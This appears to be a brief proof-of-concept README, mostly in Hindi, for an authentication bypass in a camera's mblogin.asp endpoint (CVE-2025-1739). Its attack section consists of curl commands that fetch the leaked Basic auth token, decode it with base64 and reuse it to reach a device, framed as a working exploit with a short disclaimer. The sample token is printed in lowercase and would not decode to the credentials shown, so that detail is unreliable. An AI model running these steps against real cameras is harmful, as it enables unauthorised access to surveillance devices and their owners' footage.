
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | स्कोर | CWE | प्रकार |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | बेसिक ऑथ लीक के माध्यम से प्रमाणीकरण बायपास |
कैमरा mblogin.asp एंडपॉइंट के माध्यम से एक वैध Base64-एनकोडेड बेसिक प्रमाणीकरण टोकन लीक करता है। इस टोकन को आसानी से डिकोड किया जा सकता है और डिवाइस तक अनधिकृत पहुंच प्राप्त करने के लिए पुनः उपयोग किया जा सकता है — कोई पासवर्ड ज्ञान आवश्यक नहीं।
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
प्रतिक्रिया में एक वैध बेसिक ऑथ टोकन होता है:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# आउटपुट: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp और mblogin.asp तक अनपेक्षित पहुंच की निगरानी करें।यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं। किसी भी डिवाइस का परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।